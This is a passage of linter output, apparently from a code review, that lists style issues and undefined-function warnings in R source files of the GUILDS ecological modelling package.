\n^~\n```\n[R/drawLocal.R:32:22:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n                    ~^~~\n```\n[R/drawLocal.R:32:30:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n                            ~^~\n```\n[R/drawLocal.R:32:35:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n                                 ~^\n```\n[R/drawLocal.R:32:36:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L32) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n                                   ^\n```\n[R/drawLocal.R:33:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L33) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txlft <- max(0, xlft)\n^~\n```\n[R/drawLocal.R:33:22:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txlft <- max(0, xlft)\n                    ~^~~\n```\n[R/drawLocal.R:34:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L34) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txrgt <- xmax + 10 * (xplu - xmax)\n^~\n```\n[R/drawLocal.R:34:22:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txrgt <- xmax + 10 * (xplu - xmax)\n                    ~^~~\n```\n[R/drawLocal.R:34:30:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txrgt <- xmax + 10 * (xplu - xmax)\n                            ~^~\n```\n[R/drawLocal.R:34:35:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txrgt <- xmax + 10 * (xplu - xmax)\n                                 ~^~\n```\n[R/drawLocal.R:35:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L35) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txrgt <- min(1, xrgt)\n^~\n```\n[R/drawLocal.R:35:22:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txrgt <- min(1, xrgt)\n                    ~^~~\n```\n[R/drawLocal.R:37:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L37) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tf <- function(x) {\n^~\n```\n[R/drawLocal.R:37:19:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L37) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tf <- function(x) {\n                 ~^~~\n```\n[R/drawLocal.R:38:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L38) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t    return( exp( pm_sadaux(x, I, th, j, k)))\n^~\n```\n[R/drawLocal.R:38:20:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L38) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t    return( exp( pm_sadaux(x, I, th, j, k)))\n                   ^~~~~~~~~\n```\n[R/drawLocal.R:39:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L39) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:41:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L41) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tres[cnt] <- integrate(f, xlft, xrgt, abs.tol = 1e-9)$val  #checked!!!!!1\n^~\n```\n[R/drawLocal.R:41:26:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L41) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tres[cnt] <- integrate(f, xlft, xrgt, abs.tol = 1e-9)$val  #checked!!!!!1\n                        ~^~~\n```\n[R/drawLocal.R:41:62:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L41) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tres[cnt] <- integrate(f, xlft, xrgt, abs.tol = 1e-9)$val  #checked!!!!!1\n                                                            ~^~\n```\n[R/drawLocal.R:44:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L44) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t#the original algorithm had 1:j, but at the interp1 algorithm \n^\n```\n[R/drawLocal.R:44:63:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L44) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t#the original algorithm had 1:j, but at the interp1 algorithm \n                                                              ^\n```\n[R/drawLocal.R:45:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L45) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t# does not evaluate at the ends.\n^\n```\n[R/drawLocal.R:46:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L46) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tk2 <- 1:(j - 1)  \n^\n```\n[R/drawLocal.R:46:12:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\tk2 <- 1:(j - 1)  \n          ~^\n```\n[R/drawLocal.R:46:17:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L46) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tk2 <- 1:(j - 1)  \n                ^\n```\n[R/drawLocal.R:46:17:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L46) *style:* **Trailing whitespace is superfluous.**\n```r\n​\tk2 <- 1:(j - 1)  \n                ^~\n```\n[R/drawLocal.R:47:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L47) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tkesk <- pracma::interp1(x = log2(k1), \n^\n```\n[R/drawLocal.R:47:14:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- pracma::interp1(x = log2(k1), \n            ~^~~\n```\n[R/drawLocal.R:47:35:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- pracma::interp1(x = log2(k1), \n                                 ~^~\n```\n[R/drawLocal.R:47:39:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L47) *style:* **Trailing whitespace is superfluous.**\n```r\n​\tkesk <- pracma::interp1(x = log2(k1), \n                                      ^\n```\n[R/drawLocal.R:48:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L48) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                        y = k1 * res, \n^\n```\n[R/drawLocal.R:48:35:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L48) *style:* **Put spaces around all infix operators.**\n```r\n​\t                        y = k1 * res, \n                                  ^~\n```\n[R/drawLocal.R:48:39:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L48) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t                        y = k1 * res, \n                                      ^\n```\n[R/drawLocal.R:49:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L49) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                        xi = log2(k2), \n^\n```\n[R/drawLocal.R:49:36:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L49) *style:* **Put spaces around all infix operators.**\n```r\n​\t                        xi = log2(k2), \n                                  ~^~\n```\n[R/drawLocal.R:49:40:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L49) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t                        xi = log2(k2), \n                                       ^\n```\n[R/drawLocal.R:50:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L50) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                        method = \"spline\")\n^\n```\n[R/drawLocal.R:50:40:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\t                        method = \"spline\")\n                                      ~^~\n```\n[R/drawLocal.R:51:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L51) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tk2 <- c(k2, j)\n^\n```\n[R/drawLocal.R:51:12:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\tk2 <- c(k2, j)\n          ~^~~\n```\n[R/drawLocal.R:52:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L52) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tkesk <- c(kesk, 0)\n^\n```\n[R/drawLocal.R:52:14:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L52) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- c(kesk, 0)\n            ~^~~\n```\n[R/drawLocal.R:53:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L53) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tesk <- kesk / k2\n^\n```\n[R/drawLocal.R:53:13:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L53) *style:* **Put spaces around all infix operators.**\n```r\n​\tesk <- kesk / k2\n           ~^\n```\n[R/drawLocal.R:54:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L54) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tesk[esk < pracma::eps()] <- pracma::eps()\n^\n```\n[R/drawLocal.R:54:17:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L54) *style:* **Put spaces around all infix operators.**\n```r\n​\tesk[esk < pracma::eps()] <- pracma::eps()\n               ~^~\n```\n[R/drawLocal.R:54:34:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L54) *style:* **Put spaces around all infix operators.**\n```r\n​\tesk[esk < pracma::eps()] <- pracma::eps()\n                                ~^~~\n```\n[R/drawLocal.R:55:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L55) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\treturn(esk)\n^\n```\n[R/drawLocal.R:61:5:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L61) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(length(idx0) > 0) {\n    ^\n```\n[R/drawLocal.R:62:42:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L62) *style:* **Put spaces around all infix operators.**\n```r\n​    aux <- log(th) + lgamma(I) - lgamma(I+j) +\n                                        ~^~\n```\n[R/drawLocal.R:69:9:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L69) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if ((k<j)||((k == j) && (th > 1))) {\n        ^\n```\n[R/drawLocal.R:69:11:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L69) *style:* **Put spaces around all infix operators.**\n```r\n​    if ((k<j)||((k == j) && (th > 1))) {\n         ~^~\n```\n[R/drawLocal.R:69:14:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L69) *style:* **Put spaces around all infix operators.**\n```r\n​    if ((k<j)||((k == j) && (th > 1))) {\n            ~^~~\n```\n[R/drawLocal.R:69:16:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L69) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if ((k<j)||((k == j) && (th > 1))) {\n               ^\n```\n[R/drawLocal.R:69:17:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L69) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if ((k<j)||((k == j) && (th > 1))) {\n                ^\n```\n[R/drawLocal.R:71:27:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L71) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t} else if ((k == j) && (th == 1)) {\n                          ^\n```\n[R/drawLocal.R:71:28:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L71) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t} else if ((k == j) && (th == 1)) {\n                           ^\n```\n[R/drawLocal.R:71:31:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L71) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t} else if ((k == j) && (th == 1)) {\n                             ~^~~\n```\n[R/drawLocal.R:71:37:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L71) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t} else if ((k == j) && (th == 1)) {\n                                    ^~~\n```\n[R/drawLocal.R:73:27:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L73) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t} else if ((k == j) && (th < 1)) {\n                          ^\n```\n[R/drawLocal.R:73:28:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L73) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t} else if ((k == j) && (th < 1)) {\n                           ^\n```\n[R/drawLocal.R:73:31:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L73) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t} else if ((k == j) && (th < 1)) {\n                             ~^~~\n```\n[R/drawLocal.R:73:37:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L73) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t} else if ((k == j) && (th < 1)) {\n                                   ~^~~\n```\n[R/drawLocal.R:77:17:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L77) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  idxp <- which((x > 0) & (x < 1))\n                ^\n```\n[R/drawLocal.R:79:29:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​  aux <- log(th) + lgamma(I)-lgamma(I + j) +\n                           ~^~\n```\n[R/drawLocal.R:83:13:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L83) *style:* **Put spaces around all infix operators.**\n```r\n​         (th-1) * log(1 - xx) - log(xx)\n           ~^~\n```\n[R/drawLocal.R:90:9:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L90) *warning:* **no visible global function definition for ‘getpx’, Did you mean 'get'?**\n```r\n​  nx <- getpx(theta, alpha_x, alpha_y, JX, JY)\n        ^~~~~\n```\n[R/drawLocal.R:94:27:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L94) *style:* **Put spaces around all infix operators.**\n```r\n​  I_X <- alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                         ~^~\n```\n[R/drawLocal.R:95:27:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L95) *style:* **Put spaces around all infix operators.**\n```r\n​  I_Y <- alpha_y * ny * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                         ~^~\n```\n[R/drawLocal.R:97:11:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L97) *warning:* **no visible global function definition for ‘pm_sad’**\n```r\n​  sadx <- pm_sad(theta, I_X, JX)\n          ^~~~~~\n```\n[R/drawLocal.R:98:11:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L98) *warning:* **no visible global function definition for ‘pm_sad’**\n```r\n​  sady <- pm_sad(theta, I_Y, JY)\n          ^~~~~~\n```\n[R/drawLocal.R:110:68:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L110) *style:* **Trailing whitespace is superfluous.**\n```r\n​  I_X <- alpha_x * nx * (J - 1) / (1 - alpha_x * nx - alpha_y * ny) \n                                                                   ^\n```\n[R/drawLocal.R:112:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L112) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/drawLocal.R:117:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L117) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/drawLocal.R:119:3:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L119) *style:* **Variable and function names should be all lowercase.**\n```r\n​  allN <- 0:J\n  ^~~~\n```\n[R/drawLocal.R:121:12:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L121) *warning:* **no visible global function definition for ‘polyaeggenberger’**\n```r\n​  probs <- polyaeggenberger(I_X, I_Y, J, allN)\n           ^~~~~~~~~~~~~~~~\n```\n[R/drawLocal.R:121:42:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L121) *style:* **Variable and function names should be all lowercase.**\n```r\n​  probs <- polyaeggenberger(I_X, I_Y, J, allN)\n                                         ^~~~\n```\n[R/drawLocal.R:126:11:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L126) *warning:* **no visible global function definition for ‘pm_sad’**\n```r\n​  sadx <- pm_sad(theta, I_X, NX)\n          ^~~~~~\n```\n[R/drawLocal.R:127:11:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/drawLocal.R#L127) *warning:* **no visible global function definition for ‘pm_sad’**\n```r\n​  sady <- pm_sad(theta, I_Y, NY)\n          ^~~~~~\n```\n[R/ESF_function.R:1:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/ESF_function.R#L1) *style:* **Variable and function names should be all lowercase.**\n```r\n​logLikelihood.ESF <- function(theta, m, abund) {\n^~~~~~~~~~~~~~~~~\n```\n[R/ESF_function.R:10:14:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/ESF_function.R#L10) *style:* **Put spaces around all infix operators.**\n```r\n​  I <- m * (J-1) / (1 - m)\n            ~^~\n```\n[R/ESF_function.R:12:10:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/ESF_function.R#L12) *style:* **Variable and function names should be all lowercase.**\n```r\n​  kda <- calcKDA(abund)  #confirmed in PARI\n         ^~~~~~~\n```\n[R/ESF_function.R:12:10:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/ESF_function.R#L12) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  kda <- calcKDA(abund)  #confirmed in PARI\n         ^~~~~~~\n```\n[R/ESF_function.R:14:13:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/ESF_function.R#L14) *warning:* **no visible global function definition for ‘calc_sum_kda’**\n```r\n​  sumkda <- calc_sum_kda(S, J, I, theta, kda)\n            ^~~~~~~~~~~~\n```\n[R/ESF_function.R:19:22:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/ESF_function.R#L19) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  prefactor1 <- -1 * ( sum(log(abund)) + sum(lgamma(1 + freq_x)))\n                     ^\n```\n[R/ESF_function.R:22:22:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/ESF_function.R#L22) *style:* **Put spaces around all infix operators.**\n```r\n​  factor1 <- lgamma(J+1) + prefactor1\n                    ~^~\n```\n[R/ESF_function.R:24:15:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/ESF_function.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​  factor2 <- S*log(theta)   -  (lgamma(I + J) - lgamma(I))\n             ~^~\n```\n[R/ESF_function.R:28:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/ESF_function.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  out <- -1 * esf_local(x, abund, prefactor, kda)\n^\n```\n[R/ESF_function.R:29:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/ESF_function.R#L29) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\treturn(out)\n^~\n```\n[R/ESF_function.R:44:13:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/ESF_function.R#L44) *warning:* **no visible global function definition for ‘calc_sum_kda’**\n```r\n​  sumkda <- calc_sum_kda(S, J, I, theta, kda)\n            ^~~~~~~~~~~~\n```\n[R/ESF_function.R:52:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/ESF_function.R#L52) *style:* **Variable and function names should be all lowercase.**\n```r\n​maxLikelihood.ESF <- function(init_vals, abund, verbose=TRUE) {\n^~~~~~~~~~~~~~~~~\n```\n[R/ESF_function.R:70:10:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/ESF_function.R#L70) *style:* **Variable and function names should be all lowercase.**\n```r\n​  kda <- calcKDA(abund)  #confirmed in PARI\n         ^~~~~~~\n```\n[R/ESF_function.R:70:10:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/ESF_function.R#L70) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  kda <- calcKDA(abund)  #confirmed in PARI\n         ^~~~~~~\n```\n[R/ESF_function.R:76:24:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/ESF_function.R#L76) *style:* **Put spaces around all infix operators.**\n```r\n​  prefactor <- lgamma(J+1) - ( sum(log(abund)) + sum(lgamma(1 + freq_x)) )\n                      ~^~\n```\n[R/ESF_function.R:79:15:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/ESF_function.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\t  out <- -1 * esf_local(x, abund, prefactor, kda)\n             ~^~~\n```\n[R/ESF_function.R:79:16:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/ESF_function.R#L79) *warning:* **no visible global function definition for ‘esf_local’**\n```r\n​\t  out <- -1 * esf_local(x, abund, prefactor, kda)\n               ^~~~~~~~~\n```\n[R/ESF_function.R:79:21:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/ESF_function.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\t  out <- -1 * esf_local(x, abund, prefactor, kda)\n                   ~^~\n```\n[R/ESF_function.R:83:14:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/ESF_function.R#L83) *warning:* **no visible global function definition for ‘simplex’, Did you mean 'complex'?**\n```r\n​  optimum <- simplex(init_vals, g, verbose)\n             ^~~~~~~\n```\n[R/evaluateLogLik2.R:1:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/evaluateLogLik2.R#L1) *style:* **Variable and function names should be all lowercase.**\n```r\n​evaluateLogLik <- function(v, theta_x, theta_y, alpha_x, alpha_y,\n^~~~~~~~~~~~~~\n```\n[R/evaluateLogLik2.R:17:8:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/evaluateLogLik2.R#L17) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  l <- ( (theta_x / 2) - 1) * log(nx) + ((theta_y / 2) - 1) * log(ny)\n       ^\n```\n[R/evaluateLogLik2.R:17:42:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/evaluateLogLik2.R#L17) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  l <- ( (theta_x / 2) - 1) * log(nx) + ((theta_y / 2) - 1) * log(ny)\n                                         ^\n```\n[R/evaluateLogLik2.R:19:8:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/evaluateLogLik2.R#L19) *warning:* **no visible global function definition for ‘calc_sum_kda’**\n```r\n​  s <- calc_sum_kda(Sx, Nx, I_X, (theta_x / 2), KDA_X)\n       ^~~~~~~~~~~~\n```\n[R/evaluateLogLik2.R:20:8:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/evaluateLogLik2.R#L20) *warning:* **no visible global function definition for ‘calc_sum_kda’**\n```r\n​  z <- calc_sum_kda(Sy, Ny, I_Y, (theta_y / 2), KDA_Y)\n       ^~~~~~~~~~~~\n```\n[R/expected.R:2:19:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/expected.R#L2) *style:* **Commas should always have a space after.**\n```r\n​  output <- rep(0,13)\n                  